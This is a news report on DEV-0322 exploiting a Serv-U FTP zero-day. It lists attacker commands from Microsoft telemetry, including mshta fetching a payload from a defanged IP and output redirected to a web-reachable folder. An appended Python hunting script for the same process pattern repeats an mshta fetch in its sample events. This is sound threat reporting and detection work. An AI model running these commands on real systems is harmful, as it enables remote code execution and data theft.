China-based hackers known to target US defense and software companies are now targeting organizations using a vulnerability in the SolarWinds Serv-U FTP server.
Today, SolarWinds released a security update for a zero-day vulnerability in Serv-U FTP servers that allows remote code execution when SSH is enabled.
According to SolarWinds, the vulnerability was reported by Microsoft, which saw a threat actor actively exploiting it to execute commands on vulnerable customers' devices.
Tonight, Microsoft revealed that the attacks are attributed with high confidence to a China-based threat group tracked as ‘DEV-0322.’
“This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,” says a new blog post by the Microsoft Threat Intelligence Center.
Microsoft says the DEV-0322 hacking group has previously targeted entities in the US Defense Industrial Base Sector and software companies.
“The DIB Sector is the worldwide industrial complex that enables research and development (R&D), as well as design, production, delivery, and maintenance of military weapons systems, subsystems, and components or parts, to meet U.S. military requirements,” explains a CISA document describing the DIB sector.
Attacks detected by Microsoft 365 Defender telemetry
Microsoft says it first learned of the attacks after Microsoft 365 Defender telemetry showed the normally benign Serv-U process spawning anomalous, malicious child processes.
Some of the commands executed through the remote code execution vulnerability are listed below.
C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
cmd.exe /c whoami > "./Client/Common/redacted.txt"
cmd.exe /c dir > ".\Client\Common\redacted.txt"
cmd.exe /c ""C:\Windows\Temp\Serv-U.bat""
powershell.exe C:\Windows\Temp\Serv-U.bat
cmd.exe /c type \\redacted\redacted.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"
“We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U ClientCommon folder, which is accessible from the internet by default, so that the attackers…
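As an added illustration (not code from the article or from Microsoft), the following Python sketch runs the two hunting ideas described above over process-creation records: it flags Serv-U.exe spawning a shell or script host (cmd.exe, powershell.exe, mshta.exe), and separately flags command lines that redirect output into the web-accessible Client\Common folder. The record field names (ParentImage, Image, CommandLine, as in Sysmon Event ID 1), the Serv-U install path and the sample events are my assumptions; the sample command lines are constructed and use a documentation IP rather than the real indicator.

```python
"""Hunting for the Serv-U process-tree pattern in process-creation telemetry.

Added example, not code from the article or from Microsoft. Assumes
Sysmon-style records (ParentImage, Image, CommandLine); sample events
below are constructed for illustration.
"""
import ntpath
import re
from dataclasses import dataclass

# Serv-U normally has no reason to spawn shells or script hosts.
SERVU_PARENTS = {"serv-u.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe",
                       "wscript.exe", "cscript.exe"}

# Output redirected into the Client\Common folder, either slash style
# (the article shows both "./Client/Common/" and ".\Client\Common\").
CLIENT_COMMON_RE = re.compile(r"client[\\/]+common[\\/]", re.IGNORECASE)


@dataclass
class Finding:
    reason: str
    image: str
    command_line: str


def basename(path):
    """Lower-cased file name of a Windows path, tolerant of mixed slashes."""
    return ntpath.basename(path).lower()


def analyze_event(ev):
    """Return a list of Findings for one process-creation record."""
    findings = []
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")

    # Pattern 1: Serv-U spawning cmd/powershell/mshta (the telemetry that
    # first tipped off Microsoft, per the article).
    if parent in SERVU_PARENTS and child in SUSPICIOUS_CHILDREN:
        findings.append(Finding("serv-u spawned shell/script host", child, cmdline))

    # Pattern 2: command output piped into the internet-reachable
    # Client\Common folder, regardless of parent process.
    if ">" in cmdline and CLIENT_COMMON_RE.search(cmdline):
        findings.append(Finding("command output redirected into Client\\Common", child, cmdline))
    return findings


def hunt(events):
    """Run analyze_event over every record and collect the findings."""
    out = []
    for ev in events:
        out.extend(analyze_event(ev))
    return out


# Constructed sample telemetry (install path is an assumption).
SERVU_EXE = r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe"
SAMPLE_EVENTS = [
    {"ParentImage": SERVU_EXE,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c whoami > "./Client/Common/out.txt"'},
    {"ParentImage": SERVU_EXE,
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"C:\Windows\System32\mshta.exe http://192.0.2.10/a"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign: admin shell
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.reason}] {f.image}: {f.command_line}")
```

The first sample record trips both checks (a shell spawned by Serv-U, writing into Client\Common), the second trips only the parent/child check, and the benign explorer.exe-spawned shell produces nothing. In a real deployment the same two conditions map directly onto a process-creation query in whatever EDR or SIEM holds the telemetry.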